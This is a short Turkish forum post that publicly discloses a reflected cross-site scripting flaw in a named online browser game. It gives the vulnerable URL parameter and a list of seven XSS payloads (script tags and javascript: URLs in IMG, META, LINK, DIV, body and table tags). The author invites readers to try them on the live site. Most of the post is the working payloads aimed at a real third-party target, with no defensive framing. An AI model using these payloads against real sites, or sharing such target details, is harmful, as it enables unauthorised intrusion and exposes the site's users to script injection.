Tarayıcı tabanlı çevrimiçi oyunun anasayfasında XSS açığı tespit ettim. Benim uğraşacak vaktim olmadığı için, ilgilenenler veya kendini geliştirmek isteyenler için paylaşıyorum. Dilerseniz kendinizdinizde deneyebilirsiniz.
Açığın bulunduğu url;
XSS asp kodları;
Kolay gelsin.
Açığın bulunduğu url;
Kod:
http://desertorder.com/?r=
XSS asp kodları;
Kod:
"><script>alert('XSS')</script>
"><IMG SRC="javascript:alert('XSS');">
"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
"><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
"><DIV STYLE="background-image: url(javascript:alert('XSS'))"
<body onload="javascript:alert('XSS')"></body>
"><table background="javascript:alert('XSS')"></table>
Kolay gelsin.




